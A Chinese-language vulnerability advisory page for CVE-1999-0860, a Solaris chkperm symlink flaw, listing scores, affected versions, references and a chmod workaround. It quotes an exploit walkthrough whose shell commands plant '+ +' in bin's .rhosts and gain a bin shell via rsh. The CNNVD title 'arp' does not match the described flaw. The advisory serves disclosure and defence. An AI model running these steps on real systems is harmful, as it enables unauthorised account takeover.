CVE-1999-0860
CVSS2.1
发布时间 :1999-12-01 00:00:00
修订时间 :2008-09-09 08:36:03
NMCOE    

[原文]Solaris chkperm allows local users to read files owned by bin via the VMSYS environmental variable and a symlink attack.


[CNNVD]Solaris arp漏洞(CNNVD-199912-010)

        Solaris的chkperm存在漏洞。本地用户可以通过VMSYS环境变量以及一个符号链接攻击读取bin下的文件。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: NONE [不会对系统完整性产生影响]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:sun:solaris:2.5.1::ppc
cpe:/o:sun:solaris:2.6:hw5
cpe:/o:sun:solaris:2.6:hw3
cpe:/o:sun:solaris:2.6
cpe:/o:sun:solaris:7.0::x86
cpe:/o:sun:solaris:7.0
cpe:/o:sun:solaris:2.6:hw3:x86
cpe:/o:sun:solaris:2.6:hw5:x86
cpe:/o:sun:solaris:2.6::x86
cpe:/o:sun:solaris:2.5.1::x86
cpe:/o:sun:solaris:2.5.1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0860
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0860
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-199912-010
(官方数据源) CNNVD

- 其它链接及资源

http://www.securityfocus.com/bid/837
(UNKNOWN)  BID  837

- 漏洞信息

Solaris arp漏洞
低危 其他
1999-12-01 00:00:00 2005-10-20 00:00:00
本地  
        Solaris的chkperm存在漏洞。本地用户可以通过VMSYS环境变量以及一个符号链接攻击读取bin下的文件。

- 公告与补丁

        Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- 漏洞信息 (19235)

Solaris <= 7.0 chkperm Vulnerability (EDBID:19235)
solaris local
1996-12-05 Verified
0 Kevin L Prigge
N/A [点击下载]
source: http://www.securityfocus.com/bid/295/info

Solaris 2.4, 2.5, and 2.5.1 (possibly other versions) have a package called FACE (Framed Access Command Environment) installed. Included in the package is a program called chkperm which checks a file to see if the user has permission to use the FACE interface. This program is installed suid and sgid bin, and is trivially exploitable to compromise the bin account under Solaris 2.4.

Running chkperm in a directory that has world write privilege or in a directory that belongs to bin. chkperm on Solaris 2.5 seems to create a file called <gibberish characters> in the directory from where you execute it. chkperm needs write access for user bin (or group bin) to the directory from which you execute it. It also works the same with just 'chkperm -l', you can set the environment variable VMSYS to anything.

You could then create the link (to .rhosts in the example) using the <gibberish characters> file name created by chkperm and accomplish the same result. 

% mkdir /tmp/foo
% mkdir /tmp/foo/lib
% chmod -R 777 /tmp/foo
% setenv VMSYS /tmp/foo
% umask 0000
% ln -s /usr/bin/.rhosts /tmp/foo/lib/.facerc
% /usr/vmsys/bin/chkperm -l -u foo
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 0 Nov 12 09:41 .rhosts
% echo "+ +" >> /usr/bin/.rhosts
% ls -l /usr/bin/.rhosts
-rw-rw-rw- 2 bin bin 4 Nov 12 09:41 .rhosts
% rsh -l bin localhost /bin/csh -i
Warning: no access to tty; thus no job control in this shell...
% id
uid=2(bin) gid=2(bin)

		

- 漏洞信息

6994
Solaris FACE chkperm VMSYS Environmental Variable Symlink Arbitrary File Disclosure
Local Access Required Information Disclosure, Input Manipulation
Loss of Confidentiality Workaround, Patch / RCS
Exploit Public

- 漏洞描述

Solaris chkperm utility contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when a malicious user sets the VMSYS variable to a user writeable directory, creates a symlink to .facerc, then executes chkperm which will disclose the first five lines of the file given as an argument resulting in a loss of confidentiality.

- 时间线

1996-12-05 Unknow
1996-12-05 Unknow

- 解决方案

Currently, there are no known workarounds or upgrades to correct this issue. However, Sun has released a patch (#109392-01) to address this vulnerability. In addition, this issue can be worked around by restricting permission to chkperm: chmod ug-s /usr/vmsys/bin/chkperm

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站